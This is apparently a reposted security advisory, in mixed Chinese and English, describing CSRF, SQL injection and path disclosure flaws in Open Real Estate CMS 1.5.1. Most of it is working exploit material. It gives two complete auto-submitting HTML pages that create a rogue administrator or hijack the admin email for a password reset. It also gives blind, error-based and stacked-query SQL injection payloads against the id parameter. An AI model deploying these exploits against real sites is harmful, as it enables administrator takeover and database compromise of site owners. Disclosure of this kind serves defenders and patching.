# 标题: Open Real Estate CMS - Multiple vilnerabilities # 发现者: Yashar shahinzadeh # 程序官网: http://monoray.net/products/6-open-real-estate # 测试平台: Linux & Windows, PHP 5.3.4 #影响版本 : 1.5.1 摘要: ======== 1. CSRF - Adding/Editing administrator account 2. MySQL Injection 3. Local path disclosure 1. CSRF - 添加或修改管理账号: =============================================== Following exploits can be used against any site installed "Open Real Estate" CMS. < html > <body onload="submitForm()"> <form name="myForm" id="myForm" action="http:// www.2cto.com /OpenRealEstateV1.5.1_en/users/backend/main/create" method="post"> <input type="hidden" name="User[username]" value="yashar"> <input type="hidden" name="User[email]" value="y.shahinzadeh@gmail.com"> <input type="hidden" name="User[phone]" value="09169189680"> <input type="hidden" name="User[additional_info_en]" value=""> <input type="hidden" name="User[password]" value="6658912"> <input type="hidden" name="User[password_repeat]" value="6658912"> <input type="hidden" name="yt0" value=""> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> Once the exploit is excuted, an email will send to attacker's email containing activation link. Additionally, for modifying, the administrator's ID is 1, so attack may change the administrator's email address, then he/she may use forget password option and go through administrator panel. <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http://localhost/OpenRealEstateV1.5.1_en/users/backend/main/update?id=1" method="post"> <input type="hidden" name="User[username]" value="admin"> <input type="hidden" name="User[email]" value="y.shahinzadeh@gmail.com"> <input type="hidden" name="User[phone]" value="09169189680"> <input type="hidden" name="User[additional_info_en]" value=""> <input type="hidden" name="yt0" value=""> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> 2. MySQL Injection: =================== An attacker may conduct an attack by using MySQL injection after authentication so as to get higher access like uploading a shell script or etc... I just show the injection point and a small example of devastiating usage of it: http://localhost/OpenRealEstateV1.5.1_en/apartments/backend/main/view=[Injection payload] POC: --- Place: GET Parameter: id Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: id=" RLIKE IF(7309=7309,0x4d7953514c,0x28) AND "ymsG"="ymsG Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=" AND (SELECT 1454 FROM(SELECT COUNT(*),CONCAT(0x3a6b62653a,(SELECT (CASE WHEN (1454=1454) THEN 1 ELSE 0 END)),0x3a6c66753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "KASA"="KASA Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: id="; SELECT SLEEP(5)-- --- 3. 本地路径泄露: ========================= There are some pages that are big leads to knowing local path, the path is valuable and can be used in Injection and... I would give an instance only: http://localhost/OpenRealEstateV1.5.1_en/apartments/backend/main/view /** Yasshar shahinzadeh **/
查看更多关于Open Real Estate CMS 1.5.1多个缺陷及修复 - 网站安全的详细内容...